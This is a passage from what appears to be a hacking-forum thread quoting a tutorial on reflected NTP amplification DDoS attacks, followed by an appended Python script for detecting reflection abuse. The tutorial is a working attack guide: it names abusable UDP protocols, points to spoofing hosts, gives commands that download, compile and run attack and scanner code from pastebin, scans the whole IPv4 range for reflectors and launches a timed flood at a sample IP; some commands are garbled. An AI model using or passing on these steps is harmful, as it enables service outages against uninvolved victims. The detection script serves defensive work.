[TUTORIAL] DrDoS
#11
Very nice tutorial, very self-explanatory and nicely laid out, keep it up.
Reply
#12
Great tutorial for this bot, vouch!
Reply
#13
Ohhh man, I want to see
Reply
#14
(10-10-2016, 04:35 AM)LucasYegorov Wrote:
DrDoS

1.0 Introduction to DrDoS
Distributed Reflection Denial of Service, also known as DrDoS, has been used for years to create some of the world's largest DDoS attacks! Over the past 5-6 years it has gotten so easy that now anyone can do it with just $10 and some simple knowledge of the Linux OS. Many people use DrDoS in combination with botnets; controlling mass quantities of bots that are able to launch a reflected attack can be overpowering to some. DrDoS is often used in DDoS for Hire sites.

Reflection takes advantage of UDP services. UDP, by design, is a connectionless internet protocol in which the receiver does not fully validate the IPv4 address of the source. This lack of validation makes it possible for someone to pretend to be you! Since it seems like the packets are coming from the target's IP, typically it will send all requests back to said IP. This serves 2 purposes of the attack: the attacker can hide his identity and amplify the attacks greatly.
1.1 Types of Amplification Vectors
In the past there was only DNS amplification, until people started experimenting with other UDP based protocols. Each protocol has a different Bandwidth Amplification Factor, meaning one method might amplify 100Mbps -> 5000Mbps while another might give you this result: 100Mbps -> 1000Mbps
Here is but a short list of protocols you can abuse:
DNS
CHARGEN
NTP
SNMPv2
SSDP
Quote of the Day
Teamspeak 3
Quake Network Protocol
BitTorrent
NetBIOS
MSSQL
PORTMAP
RIP
2.0 Launching a DrDoS Attack
This tutorial is focused around the NTP attack vector.
[Image: Abusing+Network+Time+Protocol+(NTP)+to+p...attack.jpg]

Here is what you will need for this:
  • Common Sense
  • Spoofed Dedicated Server with Ubuntu 14.04 64bit Installed
  • Server for reflector scanning
Here is a host that allows IP Header Modification (Spoofing):




1.) First you need to set up your attacking server. You can log in using an SSH client called PuTTY.
[Image: bb874f939b38428bafad5e30cf8d2da4.png]

2.) You will need to install the dependencies for you to run the attack script:
Code:
apt-get install gcc wget

3.) Now install the NTP Attack Script:
Code:
wget -q http://pastebin.com/raw/fcyCGWqw -O ntp.c; gcc -o ntp ntp.c -pthread; rm -dbleaker.com ntp.c; ./ntp

4.) Here is where you log in to your scanning server and run these commands:
Code:
apt-get install gcc wget -y; wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread; rm -dbleaker.com ntpscan.c; ./ntpscan
Code:
Example for scanning: ./ntpscan 1.0.0.0 255.255.255.255 ntp.txt 3 5


Should look something like this:
[Image: 94f2696d150f40e0acb745ac95343ecc.png]
5.) Filtering your reflection lists:

You will often get multiple IPs in one list. Sorts out any duplicate IPs:
cat scanned.txt | sort -u > unique.txt

Sorts IPs over a certain response size (ex: 300):
cat scannedlist.txt |awk '{if($2>300)print $1}' | sort -u > output.txt
6.) Now log back into your attacking server and upload your new filtered reflection list of NTP servers. And use this command to start an attack. Time is in seconds.

Code:
Usage: ./ntp [IP] [file] [threads] [limiter] [time]
Ex: ./ntp 75.14.61.198 ntp.txt 1 -1 300

7.) Here are some results of the successful amplification against another target:
[Image: 14af945bb98749e9a0e65765ddd1594e.png]

lovely product
Reply
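
The Bandwidth Amplification Factor from section 1.1 of the quoted tutorial can be measured from the other side, by the operator of an NTP server checking whether it is being used as a reflector. The following is an added example, not part of any post in this thread; the flow-record format, addresses and thresholds are constructed assumptions.

```python
from collections import defaultdict

# Constructed flow records: direction, server_ip, peer_ip, udp_port, bytes.
# "in" = request reaching our server, "out" = reply leaving it.
SAMPLE_FLOWS = """\
in  192.0.2.10 198.51.100.7  123 90
out 192.0.2.10 198.51.100.7  123 90
in  192.0.2.10 203.0.113.50  123 2340
out 192.0.2.10 203.0.113.50  123 1170000
in  192.0.2.11 198.51.100.9  123 180
out 192.0.2.11 198.51.100.9  123 180
"""

def parse_flows(text):
    """Yield (direction, server, peer, port, nbytes) from whitespace-separated lines."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5 or fields[0] not in ("in", "out"):
            continue  # skip blank or malformed records
        direction, server, peer, port, nbytes = fields
        yield direction, server, peer, int(port), int(nbytes)

def find_reflection(flows, port=123, min_baf=10.0, min_out_bytes=100_000):
    """Return [(server, peer, baf)] where replies dwarf requests for one peer.

    BAF = bytes sent to the peer / bytes received from it. The thresholds are
    assumptions; tune them against normal traffic for the service.
    """
    totals = defaultdict(lambda: {"in": 0, "out": 0})
    for direction, server, peer, p, nbytes in flows:
        if p == port:
            totals[(server, peer)][direction] += nbytes
    findings = []
    for (server, peer), t in sorted(totals.items()):
        # Replies with no matching request at all are treated as infinite BAF.
        baf = t["out"] / t["in"] if t["in"] else float("inf")
        if baf >= min_baf and t["out"] >= min_out_bytes:
            findings.append((server, peer, round(baf, 1)))
    return findings

if __name__ == "__main__":
    for server, peer, baf in find_reflection(parse_flows(SAMPLE_FLOWS)):
        print(f"{server} is amplifying toward {peer}: BAF {baf}")
```

The peer in a finding is the address the replies are delivered to, which in a reflection attack is the spoofed victim rather than the real sender.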

